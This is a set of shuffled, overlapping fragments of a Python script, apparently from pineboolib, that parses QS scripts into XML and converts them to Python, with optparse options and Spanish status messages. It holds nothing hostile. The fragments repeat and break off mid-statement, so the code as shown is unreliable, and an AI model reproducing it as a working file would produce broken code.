"\"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone =",
"regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options, args",
"description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname =",
"value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn,",
"post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename)))",
"= os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description",
"class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname =",
"[\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags",
"if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast",
"filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args)",
"[\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if",
"object from optparse import OptionParser import os import os.path import sys import imp",
"class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values)",
"argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags",
"n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata):",
"tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data)",
"= [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class",
"= os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname =",
"parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots",
"tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"]",
"subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj",
"str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"')",
"no hace falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog,",
"KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for",
"not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args)",
"def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python",
"\"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags",
"default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in",
"description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except",
"print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue",
"1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return",
"tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return",
"----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj",
"for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib:",
"vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\",",
"class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags =",
"self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\",",
"return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None:",
"%-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se",
"for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x",
"tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types",
"self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\")",
"def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return",
"results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\",",
"if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" %",
"listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj:",
"[\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # -----",
"= [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class",
"if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) ==",
"= None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if",
"% filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . .",
"os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname =",
"execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True",
"['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject):",
"file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def",
"== \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype ==",
"not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if",
"= [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and",
"len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag",
"self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def",
"100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent =",
"= None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def",
"= options.exec_python options.exec_python = False options.full = False options.toxml = True if options.verbose:",
"destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1",
"self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def",
"self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list']",
"def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist",
"and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject):",
"repr(filename))) continue if not options.toxml: # Si no se quiere guardar resultado, no",
"\"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn):",
"\"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct):",
"self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def",
"polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) #",
"if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines()))",
"if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return",
"import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS",
"self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype,",
"default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname]",
"result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print",
"\"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 *",
"tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS,",
"convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test",
"= False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args])",
"0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags =",
"vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\"",
"= False except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close()",
"in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return",
"[\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject):",
"parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args)",
"%r no encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc())",
"= True if options.verbose: print(\"Pass 1 - Parse and write XML file .",
"parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist)",
"tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"]",
"class Module(object): def __init__(self, name, path): self.name = name self.path = path def",
"import os.path import sys import imp import traceback from lxml import etree try:",
"Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"]",
"execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc())",
"= [x for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x)",
"False options.full = False options.toxml = True if options.verbose: print(\"Pass 1 - Parse",
"for k, v in treedata['content']: if type(v) is dict: instruction = parse(k, v)",
"action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If",
"name) elif options.topython: from .pytnyzer import pythonize import io if options.cache: args =",
"return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj",
"% bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x",
"# return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy()",
"nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath:",
"os import os.path import sys import imp import traceback from lxml import etree",
"value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"]",
"tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value):",
"\"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject):",
"self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"]",
"[\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone =",
"pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename)",
"tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = []",
"for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) >",
"= False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\",",
"adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1:",
"Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class",
"(nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream =",
"USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS",
"False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id =",
"[\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"]",
"%-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf +",
"False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write XML",
"vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\"",
"in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return",
"self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class",
"* (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream",
"== 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\"",
"self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags",
"UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames:",
"value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\"",
"\"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\"",
"traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import",
"except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype",
"qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\",",
"self.path = path def loadModule(self): fp = None try: description = ('.py', 'U',",
"write XML file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\")",
"value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) ==",
"tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj =",
"self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"]",
"= False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"]",
"tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem):",
"return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False class",
"pythonize import io if options.cache: args = [x for x in args if",
"instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v)",
"if options.verbose: print(\"Pass 3 - Test PY file load . . .\") options.topython",
"InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other",
"e: print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv): parser",
"[\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other =",
"add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags",
"'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname",
"e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue",
"vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value):",
"TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags =",
"if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype =",
"self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags =",
"tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags =",
"decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def",
"= False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem =",
"tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject):",
"fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc',",
"ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg",
"fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module",
"continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s",
"= tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values =",
"return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't",
"options.verbose: print(\"Pass 3 - Test PY file load . . .\") options.topython =",
"enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . .",
"ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags =",
"se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath,",
"v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k,",
"= True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def",
"print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog",
"[\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject):",
"# fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result",
"\\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se",
"help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from",
"etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\")",
"tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"]",
"\"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\":",
"ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags =",
"\"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn))",
"= [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject):",
"omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname",
"debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class",
"File: %-35s . . . . (%.1f%%) \" % (bname, 100.0 * (nf",
"def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj =",
"print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import",
"= ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self):",
"in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname =",
"self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn,",
"# if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return",
"= [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def",
"= [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn ==",
"tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def",
"os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\",",
"adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list']",
"len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject):",
"def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator",
"self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject):",
"tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname",
"destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero",
"print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath =",
"default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return",
"\\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere",
"= cls break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname,",
"self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self,",
"[\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls,",
"for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname,",
"len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag =",
"args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options,",
"debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other =",
"is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i",
"\"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\":",
"[] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren():",
"\"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"]",
"args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False",
"return True # ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types:",
"= [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self",
"= [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class",
"= True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True",
"for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif",
"value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype ==",
"Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn,",
"add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if",
"self.name = name self.path = path def loadModule(self): fp = None try: description",
"try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname",
"os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in",
"a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear",
"== 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag ==",
"path def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) #",
"options.cache: args = [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\",",
"% (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere guardar",
"Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython:",
"\"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class",
"= [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class",
"exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main():",
"if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if",
"[\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class",
"#!/usr/bin/python from builtins import str from builtins import object from optparse import OptionParser",
"\"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is",
"subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\",",
"set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other",
"print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue()",
"tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] =",
"\"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"]",
"\":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn,",
"class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags",
"import str from builtins import object from optparse import OptionParser import os import",
"cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id",
"return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return",
"\\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else:",
"= False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other =",
"in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")]",
"class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self,",
"tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn",
"While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags =",
"self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r",
"tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"]",
"print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No",
"value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname =",
"= ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"]",
". . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml =",
"\\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s",
"self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject):",
"\"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class",
